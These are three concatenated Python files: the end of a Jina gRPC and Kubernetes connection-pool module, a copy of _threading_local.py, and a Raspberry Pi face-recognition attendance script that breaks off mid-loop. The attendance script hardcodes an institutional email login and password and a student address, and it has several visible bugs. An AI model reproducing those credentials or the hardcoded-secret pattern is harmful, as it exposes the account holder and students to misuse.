return address in self._address_to_connection_idx
class ConnectionPool:
"""
Manages a list of connections.
:param logger: the logger to use
:param on_demand_connection: Flag to indicate if connections should be created on demand
"""
def __init__(self, logger: Optional[JinaLogger] = None, on_demand_connection=True):
self._connections = {}
self._on_demand_connection = on_demand_connection
self._logger = logger or JinaLogger(self.__class__.__name__)
def send_message(self, msg: Message, target_address: str):
"""Send msg to target_address via one of the pooled connections
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
if target_address in self._connections:
pooled_connection = self._connections[target_address].get_next_connection()
return self._send_message(msg, pooled_connection)
elif self._on_demand_connection:
# If the pool is disabled and an unknown connection is requested: create it
connection_pool = self._create_connection_pool(target_address)
return self._send_message(msg, connection_pool.get_next_connection())
else:
raise ValueError(f'Unknown address {target_address}')
def _create_connection_pool(self, target_address):
port = target_address[target_address.rfind(':') + 1 :]
connection_pool = ConnectionList(port=port)
connection_pool.add_connection(
target_address, self._create_connection(target=target_address)
)
self._connections[target_address] = connection_pool
return connection_pool
def start(self):
"""
Starts the connection pool
"""
pass
def close(self):
"""
Closes the connection pool
"""
self._connections.clear()
@abstractmethod
def _send_message(self, msg: Message, connection):
...
@abstractmethod
def _create_connection(self, target):
...
class GrpcConnectionPool(ConnectionPool):
"""
GrpcConnectionPool which uses gRPC as the communication mechanism
"""
def _send_message(self, msg: Message, connection):
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(new_message, stub):
await stub.Call(new_message)
return asyncio.create_task(task_wrapper(msg, connection))
def _create_connection(self, target):
self._logger.debug(f'create connection to {target}')
channel = grpc.aio.insecure_channel(
target,
options=[
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
],
)
return jina_pb2_grpc.JinaDataRequestRPCStub(channel)
class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger, on_demand_connection=False)
self._namespace = namespace
self._deployment_clusteraddresses = {}
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
self._fetch_initial_state()
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
while self.enabled:
event = await self._k8s_event_queue.get()
self._process_item(event)
def run(self):
"""
Subscribes on MODIFIED events from list_namespaced_pod AK8s PI
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
def close(self):
"""
Closes the connection pool
"""
self.enabled = False
self._process_events_task.cancel()
self._api_watch.stop()
super().close()
def send_message(self, msg: Message, target_address: str):
"""
Send msg to target_address via one of the pooled connections.
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
host, port = target_address.split(':')
# host can be a domain instead of IP Address, resolve it to IP Address
return super().send_message(msg, f'{socket.gethostbyname(host)}:{port}')
@staticmethod
def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
@staticmethod
def _pod_is_ready(item):
return item.status.container_statuses is not None and all(
cs.ready for cs in item.status.container_statuses
)
def _process_item(self, item):
deployment_name = item.metadata.labels["app"]
is_deleted = item.metadata.deletion_timestamp is not None
if not is_deleted and self._pod_is_up(item) and self._pod_is_ready(item):
if deployment_name in self._deployment_clusteraddresses:
self._add_pod_connection(deployment_name, item)
else:
try:
cluster_ip, port = self._find_cluster_ip(deployment_name)
if cluster_ip:
self._deployment_clusteraddresses[
deployment_name
] = f'{cluster_ip}:{port}'
self._connections[f'{cluster_ip}:{port}'] = ConnectionList(port)
self._add_pod_connection(deployment_name, item)
else:
self._logger.debug(
f'Observed state change in unknown deployment {deployment_name}'
)
except (KeyError, ValueError):
self._logger.debug(
f'Ignoring changes to non Jina resource {item.metadata.name}'
)
elif (
is_deleted
and self._pod_is_up(item)
and deployment_name in self._deployment_clusteraddresses
):
self._remove_pod_connection(deployment_name, item)
def _remove_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Removing connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
self._connections[
self._deployment_clusteraddresses[deployment_name]
].remove_connection(f'{target}:{connection_pool.port}')
def _add_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if not connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Adding connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
connection_pool.add_connection(
f'{target}:{connection_pool.port}',
self._create_connection(target=f'{target}:{connection_pool.port}'),
)
def _extract_app(self, service_item):
if service_item.metadata.annotations:
return ast.literal_eval(
list(service_item.metadata.annotations.values())[0]
)['spec']['selector']['app']
elif service_item.metadata.labels:
return service_item.metadata.labels['app']
return None
def _find_cluster_ip(self, deployment_name):
service_resp = self._k8s_client.list_namespaced_service(self._namespace)
for s in service_resp.items:
app = self._extract_app(s)
if app and deployment_name == app and s.spec.cluster_ip:
# find the port-in for this deployment
for p in s.spec.ports:
if p.name == 'port-in':
return s.spec.cluster_ip, p.port
return None, None
def is_remote_local_connection(first: str, second: str):
"""
Decides, whether ``first`` is remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
def get_connect_host(
bind_host: str,
bind_expose_public: bool,
connect_args: Namespace,
) -> str:
"""
Compute the host address for ``connect_args``
:param bind_host: the ip for binding
:param bind_expose_public: True, if bind socket should be exposed publicly
:param connect_args: configuration for the host ip connection
:return: host ip
"""
runs_in_docker = connect_args.runs_in_docker
# by default __default_host__ is 0.0.0.0
# is BIND at local
bind_local = bind_host == __default_host__
# is CONNECT at local
conn_local = connect_args.host == __default_host__
# is CONNECT inside docker?
# check if `uses` has 'docker://' or,
# it is a remote pea managed by jinad. (all remote peas are inside docker)
conn_docker = (
(
getattr(connect_args, 'uses', None) is not None
and (
connect_args.uses.startswith('docker://')
or connect_args.uses.startswith('jinahub+docker://')
)
)
or not conn_local
or runs_in_docker
)
# is BIND & CONNECT all on the same remote?
bind_conn_same_remote = (
not bind_local and not conn_local and (bind_host == connect_args.host)
)
# pod1 in local, pod2 in local (conn_docker if pod2 in docker)
if bind_local and conn_local:
return __docker_host__ if conn_docker else __default_host__
# pod1 and pod2 are remote but they are in the same host (pod2 is local w.r.t pod1)
if bind_conn_same_remote:
return __docker_host__ if conn_docker else __default_host__
if bind_local and not conn_local:
# in this case we are telling CONN (at remote) our local ip address
if connect_args.host.startswith('localhost'):
# this is for the "psuedo" remote tests to pass
return __docker_host__
return get_public_ip() if bind_expose_public else get_internal_ip()
else:
# in this case we (at local) need to know about remote the BIND address
return bind_host
def create_connection_pool(args: 'Namespace') -> ConnectionPool:
"""
Creates the appropriate connection pool based on args
:param args: Arguments for this pod
:return: A connection pool object
"""
if args.k8s_namespace and args.k8s_connection_pool:
from jina.peapods.pods.k8slib.kubernetes_client import K8sClients
k8s_clients = K8sClients()
return K8sGrpcConnectionPool(
namespace=args.k8s_namespace,
client=k8s_clients.core_v1,
)
else:
return GrpcConnectionPool()
|
_threading_local.py | """Thread-local objects
(Note that this module provides a Python version of thread
threading.local class. Depending on the version of Python you're
using, there may be a faster one available. You should always import
the local class from threading.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
# Threading import is at end
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__():
threading_enumerate = enumerate
__getattribute__ = object.__getattribute__
def __del__(self):
key = __getattribute__(self, '_local__key')
try:
threads = list(threading_enumerate())
except:
# if enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
return __del__
__del__ = __del__()
try:
from threading import currentThread, enumerate, RLock
except ImportError:
from dummy_threading import currentThread, enumerate, RLock
|
eexec2.py | import RPi.GPIO as GPIO
import time
import picamera
import face_recognition.api as face_recognition
import os,shutil
import json
import numpy
from PIL import Image
from datetime import date,datetime
import smtplib
import random
import math
import openpyxl
from openpyxl.styles import Font
import openpyxl
from openpyxl.styles import Font
import cv2
import shutil
from time import sleep
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import tkinter as tk
from PIL import Image,ImageEnhance
import face_recognition
from resizeimage import resizeimage
import tflite_runtime.interpreter as tflite
import argparse
import numpy as np
import sys
from threading import Thread
import importlib.util
import schedule
import threading
import socket
import tqdm
import shutil
day=int(date.today().day)
def extract_count(gpath,epath,filename):
print("in extract")
image = face_recognition.load_image_file(gpath)
face_locations = face_recognition.face_locations(image,number_of_times_to_upsample=0)
count=len(face_locations)
if count==0:
img=Image.open(gpath)
l=img.size
m=max(l)
img.save(gpath,img.format)
out=Image.open(gpath)
out=out.rotate(270)
out.save(gpath)
image = face_recognition.load_image_file(gpath)
face_locations = face_recognition.face_locations(image)
count=len(face_locations)
if count>0:
i=0
for face_location in face_locations:
i=i+1
top, right, bottom, left = face_location
face_image = image[top:bottom, left:right]
pil_image = Image.fromarray(face_image)
name =filename+ "-"+str(i) +'.png'
pil_image.save(epath+name)
print("exiting extract")
return count
def match(current_img,temppath,erpath,jsonpath,excelpath):
print("in match")
now = datetime.now()
time=str(now.strftime("%I:%M %p"))
data = open(jsonpath,"r")
n=data.read()
originallist=json.loads(n)
for i in originallist:
originallist[i]=numpy.asarray(originallist[i])
l=[]
for a in range(0,2):
extractedlist=[]
for filename in os.listdir(temppath):
sublist=[]
filename=str(filename)
sublist.append(filename)
file_path=temppath+filename
image=face_recognition.load_image_file(file_path)
image_encoding=face_recognition.face_encodings(image,num_jitters=5)
if len(image_encoding)>0:
image_encoding=image_encoding[0]
sublist.append(image_encoding)
extractedlist.append(sublist)
else:
shutil.move(temppath+filename,erpath)
se1("Error! Please retake the photo")
for key in originallist:
rollno=key[0:20]
if rollno in l:
continue
for esublist in extractedlist:
oimg=originallist[key]
eimg=esublist[1]
result=face_recognition.compare_faces([oimg],eimg,tolerance=0.435)
if result[0]== True:
os.remove(temppath+esublist[0])
l.append(rollno)
extractedlist.remove(esublist)
break
for temp_img in os.listdir(temppath):
os.remove(temppath+str(temp_img))
for err_img in os.listdir(erpath):
os.remove(erpath+str(err_img))
print("exiting match")
return l
def mail(email,name):
print("in mail")
now = datetime.now()
time=str(now.strftime("%I:%M %p"))
content = '\nHello '+name+'\n Thank you using Face recognition based attendance,\n Your timestamp has been recorded at '+time+'.\n Thank you'
username = "attendance@nmrec.edu.in"
password = "nmrec@frba"
sender = "attendance@nmrec.edu.in"
recipient = email
mail = smtplib.SMTP("smtp.gmail.com",587)
mail.ehlo()
mail.starttls()
mail.ehlo()
mail.login(username,password)
header = 'To:' + recipient + '\n' + 'From:' + sender + '\n' + 'Subject: Time Stamp Recorded \n'
content = header+content
mail.sendmail(sender,recipient,content)
mail.close
print("exiting mail")
return(0)
def comput(ws,day,c,l,wb,excelpath):
print("in comput")
day=int(date.today().day)
mnth=str(date.today().month)
if(int(mnth)<10):
mnth=str('0'+mnth)
yr=str(date.today().year)
today = str(date.today())
name = []
email = []
now = datetime.now()
time=str(now.strftime("%I:%M %p"))
ws=wb.active
ws.column_dimensions['A'].width = 30
ws.column_dimensions['B'].width = 30
ws.column_dimensions['C'].width = 30
ws.row_dimensions[1].height = 38
ws['A1'].font = Font(bold=True)
ws['B1'].font = Font(bold=True)
max_col = ws.max_column
m_row = ws.max_row
if(ws.cell(row = 1,column = max_col+1).value == None):
ws.cell(row =1 ,column = max_col+1).value = "IN-TIME"
ws.cell(row =1 ,column = max_col+2).value = "OUT-TIME"
for i in range(2, m_row + 1):
for j in l:
if(ws.cell(row = i, column = 1).value == j):
while True:
if(ws.cell(row = i , column = c+1).value == None):
ws.cell(row = i, column = c+1).value = time
na = ws.cell(row = i, column = 2).value
name.append(na)
Mail = str(ws.cell(row = i, column = 3).value)
email.append(Mail)
break
else:
c+=1
if(day > 0 and day < 16):
wb.save(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
cur_sheetpath=str(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
else:
wb.save(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
cur_sheetpath=str(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
if l:
i=0
for m in email:
t=threading.Thread(target=mail, args=(m,name[i]))
t.start()
t.join()
i+=1
msg = str(','.join(l))+':'+str(','.join(name))
else:
msg = "Image not found!,Please retake image"
print(msg)
print("exiting comput")
return msg
def create_sheet(l,excelpath):
print("in create sheet")
day=int(date.today().day)
mnth=str(date.today().month)
if(int(mnth)<10):
mnth=str('0'+mnth)
yr=str(date.today().year)
today = str(date.today())
if(day == 1 or day == 16):
print("new excel sheet")
wb = openpyxl.Workbook()
ws = wb.active
ws.title = today
wb_temp = openpyxl.load_workbook(excelpath+"/template.xlsx")
ws_temp = wb_temp.active
m_column = ws_temp.max_column
m_row = ws_temp.max_row
for i in range(1, m_row + 1):
for j in range(1,m_column+1):
ws.cell(row = i, column = j).value = ws_temp.cell(row = i, column = j).value
wb.save(excelpath+today+".xlsx")
l=comput(ws,day,m_column,l,wb,excelpath)
elif(day > 1 and day < 16):
try:
wb = openpyxl.load_workbook(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
ws = wb.active
except:
wb = openpyxl.Workbook()
ws = wb.active
wb.save(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
wb_temp = openpyxl.load_workbook(excelpath+"/template.xlsx")
ws_temp = wb_temp.active
m_column = ws_temp.max_column
list = wb.sheetnames
if(today in list):
ws = wb[today]
else:
wb.create_sheet(index = 0 , title = today)
ws = wb.active
m_row = ws_temp.max_row
for i in range(1, m_row + 1):
for j in range(1,m_column+1):
ws.cell(row = i, column = j).value = ws_temp.cell(row = i, column = j).value
wb.save(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
l=comput(ws,day,m_column,l,wb,excelpath)
else:
try:
wb = openpyxl.load_workbook(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
ws = wb.active
except:
wb = openpyxl.Workbook()
ws = wb.active
wb.save(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
wb_temp = openpyxl.load_workbook(excelpath+"/template.xlsx")
ws_temp = wb_temp.active
m_column = ws_temp.max_column
list = wb.sheetnames
if(today in list):
ws = wb[today]
else:
wb.create_sheet(index = 0 , title = today)
ws = wb.active
m_row = ws_temp.max_row
for i in range(1, m_row + 1):
for j in range(1,m_column+1):
ws.cell(row = i, column = j).value = ws_temp.cell(row = i, column = j).value
wb.save(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
l=comput(ws,day,m_column,l,wb,excelpath)
print("exiting createsheet")
return l
def compute():
face_cascade = cv2.CascadeClassifier('Cascades/haarcascade_frontalface_default.xml')
project=os.getcwd()+"/"
default=project+"images/"
if not os.path.isdir(str(default)):
os.mkdir(str(default))
erpath=str(default+"error/")
if not os.path.isdir(erpath):
os.mkdir(erpath)
excelpath=str(default+"excel/")
if not os.path.isdir(excelpath):
os.mkdir(excelpath)
opath=str(default+"original/")
if not os.path.isdir(opath):
os.mkdir(str(default+"original/"))
dailypath=str(default+"daily/")
if not os.path.isdir(dailypath):
os.mkdir(dailypath)
temppath=str(default+"temporary/")
if not os.path.isdir(temppath):
os.mkdir(temppath)
jsonpath=str(default+"/original.json")
foldername=str(date.today())
filename=""
i=1
while(i):
todayfolder=str(dailypath+foldername+"/")
if not os.path.isdir(todayfolder):
os.mkdir(todayfolder)
fpath1=todayfolder+"/"+str(i)+".png"
if(os.path.isfile(fpath1)):
i+=1
continue
else:
filename=fpath1
tempfile = str(i)
break
camera=PiCamera()
camera.start_preview()
sleep(3)
camera.capture('test.png')
camera.stop_preview()
camera.close()
im=Image.open('test.png')
width, height=im.size
left= (width-600)/2
top=(height-600)/2
right=(width+600)/2
bottom=(height+720)/2
im=im.crop((left,top,right,bottom))
im.save('/'+todayfolder+'/'+str(i)+'.png')
hi=tf()
if hi==1:
f="please retake image"
return(f)
else:
extract_count(filename,temppath,tempfile)
l=match(filename,temppath,erpath,jsonpath,excelpath)
msg = create_sheet(l,excelpath)
se(msg)
def se(ms):
root=tk.Tk()
t=str(ms)
t.replace(':',':\n')
x=t.split(':')
if x[0]:
try:
l=tk.Label(root,text="Time stamp recorded for:\n"+x[0]+'\n'+x[1],font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
except:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
else:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
root.attributes('-fullscreen',True)
if x[0]:
root.after(5000,lambda: root.destroy())
root.mainloop()
return(0)
def se1(ms):
root=tk.Tk()
t=str(ms)
if t.find("ensor"):
try:
x=StringVar()
x.set(x.get()+'\n Please move towards Sensor')
l=tk.Label(root,textvariable=x,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
except:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
else:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
root.attributes('-fullscreen',True)
root.after(1000,lambda: root.destroy())
root.mainloop()
return(0)
def sendmail():
try:
while True:
fromaddr = "attendance@nmrec.edu.in"
toaddr = "18b61a05d6@nmrec.edu.in"
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Subject of the Mail"
body = "Body_of_the_mail"
msg.attach(MIMEText(body, 'plain'))
day=int(date.today().day)
mnth=str(date.today().month)
if(int(mnth)<10):
mnth=str('0'+mnth)
yr=str(date.today().year)
today = str(date.today())
print("intry")
print(yr+"-"+mnth+"-")
if day<=15:
filename = os.getcwd()+"/images/excel/"+yr+"-"+mnth+"-"+"01.xlsx"
else:
filename = os.getcwd()+"/images/excel/"+yr+"-"+mnth+"-"+"16.xlsx"
import pandas as pd
empty=os.getcwd()+"/images/excel/Empty_File.xlsx"
data=pd.read_excel(filename,sheet_name=today)
data.to_excel(empty,sheet_name='temporary')
attachment = open(empty,"rb")
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(p)
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(fromaddr, "nmrec@frba")
text = msg.as_string()
s.sendmail(fromaddr, toaddr, text)
s.quit()
print ("Email sent at:")
print(current_time)
break
except:
print("There is no "+today+" worksheet")
def tf():
print("In object")
parser = argparse.ArgumentParser()
parser.add_argument('--model', help='Provide the path to the TFLite file, default is models/model.tflite',
default='models/model.tflite')
parser.add_argument('--labels', help='Provide the path to the Labels, default is models/labels.txt',
default='models/labels.txt')
parser.add_argument('--image', help='Name of the single image to perform detection on',
default='test.png')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
args = parser.parse_args()
PATH_TO_MODEL_DIR = args.model
PATH_TO_LABELS = args.labels
IMAGE_PATH = args.image
MIN_CONF_THRESH = float(args.threshold)
start_time = time.time()
interpreter = tflite.Interpreter(model_path=PATH_TO_MODEL_DIR)
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
end_time = time.time()
elapsed_time = end_time - start_time
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
frame_rate_calc = 1
freq = cv2.getTickFrequency()
current_count=0
t1 = cv2.getTickCount()
image = cv2.imread(IMAGE_PATH)
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
imH, imW, _ = image.shape
image_resized = cv2.resize(image_rgb, (width, height))
input_data = np.expand_dims(image_resized, axis=0)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
boxes = interpreter.get_tensor(output_details[0]['index'])[0]
classes = interpreter.get_tensor(output_details[1]['index'])[0]
scores = interpreter.get_tensor(output_details[2]['index'])[0]
for i in range(len(scores)):
if ((scores[i] > MIN_CONF_THRESH) and (scores[i] <= 1.0)):
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(image, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
object_name = labels[int(classes[i])]
label = '%s: %d%%' % (object_name, int(scores[i]*100))
current_count+=1
print("Exiting objecdt")
if(object_name=='phone' and object_name=='person') or (object_name=='paper' and object_name=='person') or (object_name=='ipad' and object_name=='person') or (object_name=='phone') or (object_name=='paper') or (object_name=='ipad'):
return(1)
else:
return(0)
def sendr():
if(day > 0 and day < 16):
src=os.getcwd()+"/images/excel/2021-01-01.xlsx"
dst=os.getcwd()
shutil.copy(src, dst)
else:
src=os.getcwd()+"/images/excel/2021-01-16.xlsx"
dst=os.getcwd()
shutil.copy(src, dst)
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 4096
host = "192.168.0.104" #Static ip of server(localserver)
port = 5002 #device1 will have this port
import openpyxl as xl;
if(day > 0 and day < 16):
filename =os.getcwd()+"/2021-01-01.xlsx"
else:
filename =os.getcwd()+"/2021-01-16.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
filename1 =os.getcwd()+"/Emp2.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.active
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
filename = "Emp2.xlsx"
filesize = os.path.getsize(filename)
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
break
s.sendall(bytes_read)
progress.update(len(bytes_read))
s.close()
recvr()
def recvr():
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5005
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
s = socket.socket()
try:
s.bind((SERVER_HOST, SERVER_PORT))
except:
o="Unable to bind"
return o
while True:
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
client_socket, address = s.accept()
print(f"[+] {address} is connected.")
recd = client_socket.recv(BUFFER_SIZE)
try:
received = recd.decode()
except:
u="Unable to recieve, Please retake image"
print(u)
return u
filename, filesize = received.split(SEPARATOR)
filesize = int(filesize)
progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for _ in progress:
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
break
f.write(bytes_read)
progress.update(len(bytes_read))
break
s.close()
print("server closed")
if(day > 0 and day < 16):
import openpyxl as xl;
filename ="source.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
if(day > 0 and day < 16):
filename1 =os.getcwd()+"/images/excel/2021-01-01.xlsx"
else:
filename1 =os.getcwd()+"/images/excel/2021-01-16.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.worksheets[0]
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
else:
import openpyxl as xl;
filename ="source.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
filename1 =os.getcwd()+"/images/excel/2021-01-16.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.worksheets[0]
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
TRIG=21
ECHO=20
GPIO.setmode(GPIO.BCM)
def place():
dailypath=os.getcwd()+"/images/daily/"
shutil.rmtree(dailypath)
schedule.every().saturday.at("17:35").do(place)
schedule.every().day.at("11:00").do(sendr)
schedule.every().day.at("17:00").do(sendr)
schedule.every().day.at("11:02").do(sendmail)
schedule.every().day.at("17:02").do(sendmail)
now = datetime.now()
current_time=now.strftime("%H:%M:%S")
if (current_time=="16:55:00" or current_time=="11:00:00"):
sendmail()
while True:
